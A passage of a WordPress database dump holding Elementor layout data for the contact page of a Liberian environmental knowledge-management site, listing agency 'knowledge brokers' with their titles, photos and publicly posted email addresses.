href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\nManager\\nDepartment of Marine Fisheries and Environment\\nNaFAA\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Martin Killen <\\/strong><br \\/>IT Officer<br \\/>NaFAA<br \\/><a href=\\\"mailto:maskillen@nafaa.gov.lr\\\">maskillen@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9bf0510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e162bb8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"593819f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3ef1bd5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"334f9e9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(24003,3517,'_elementor_edit_mode','builder'),(24004,3517,'_elementor_template_type','wp-page'),(24005,3517,'_elementor_version','3.0.16'),(24006,3517,'_wp_page_template','default'),(24007,3517,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br \\/><a>bjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"